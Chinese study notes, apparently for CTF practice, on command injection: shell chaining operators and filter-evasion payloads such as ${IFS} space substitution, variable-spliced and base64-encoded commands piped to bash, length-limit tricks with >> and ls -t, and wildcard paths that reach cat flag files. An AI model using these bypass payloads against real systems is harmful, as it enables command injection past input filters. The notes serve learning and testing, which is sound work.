命令执行漏洞
命令执行漏洞简介:用户提交的数据能被windows,linux当成命令执行。
命令执行漏洞拼接符号
&:无论左边是false还是true,右边都执行
|:无论左边是false还是true,右边都会执行
&&:具有短路效果,左边是false,右边不执行。
||:具有短路效果,左边是true,右边不执行。
反引号和$()中的内容会被当成命令首先执行。
windows:
&:前面语句为假时直接执行后面的命令。
&&:前面的语句为假时直接出错,后面的命令也不执行
|:直接执行后面的语句
||:前面出错执行后面的语句
linux:
;:前面的执行完执行后面的
&:无论前面的语句真假都会执行
&&:只有前面为真时才执行后面
|:显示后面的执行结果
||:当前面的执行错误时执行后面的
命令执行绕过
空格绕过
1.使用${IFS}/${IFS}$1/$IFS$1等符号替代空格
2.重定向符号:<>/<
3.%09(php中的空格)
黑名单绕过
1.使用shell变量拼接被黑名单限制的关键词
a=c;b=at;c=fl;d=ag;e=.txt;$a$b $c$d$e;
2.编码
使用反引号包含base64解码后的命令
`echo "Y2F0IGZsYWcudHh0Cg==" | base64 -d`
将base64解码后的命令通过管道符传递给bash
echo "Y2F0IGZsYWcudHh0Cg==" | base64 -d | bash
3.在命令中添加特殊字符(单引号/双引号/\(反斜杠)/$1)
c''a""t f\l$1ag
读文件函数
(1)more:一页一页的显示档案内容
(2)less:与 more 类似,但是比 more 更好的是,他可以[pg dn][pg up]翻页
(3)head:查看头几行
(4)tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示
(5)tail:查看尾几行
(6)nl:显示的时候,顺便输出行号
(7)od:以二进制的方式读取档案内容
(8)vi:一种编辑器,这个也可以查看
(9)vim:一种编辑器,这个也可以查看
(10)sort:可以查看
(11)uniq:可以查看
(12)file -f:报错出具体内容
长度绕过
1.使用>>绕过长度限制
使用>>每次添加一部分命令到文件中
echo -n "cmd1" > r;
echo -n "cmd2" >> r;
echo -n "cmd3" >> r;
echo "cmd4" >> r;
然后使用cat r | bash执行命令
2.使用换行执行和ls -t绕过长度限制
linux中,文件中的命令如果需要换行书写,需要在前一行末尾增加\,如文件a中有
ca\
t flag.t\
xt
使用sh a即可执行命令cat flag.txt
ls -t可根据时间创建顺序逆序输出文件名
a可以创建一个名为a的文件
按照这个思路,可以使用
> "ag"
> "fl\\"
> "t \\"
> "ca\\"
然后使用ls -t > s
s中文件内容就是
s
ca\
t \
fl\
ag\
其他的无关内容
之后使用sh s,即可执行cat flag
通配符绕过
/???会去寻找 / 目录下的三个字符长度的文件,正常情况下会寻找到/bin,然后/?[a][t]会优先匹配到/bin/cat,就成功调用了cat命令,然后后面可以使用正常的通配符匹配所需读的文件,如flag.txt文件名长度为8,使用8个?’’,此命令就会读取所有长度为8的文件。
/???/?[a][t] ?’’?’’?’’?’’?’’?’’?’’?’’
命令嵌套
echo “result:whoami
”
echo “result:$(uname -a)”
参考:https://www.bilibili.com/read/cv8197693/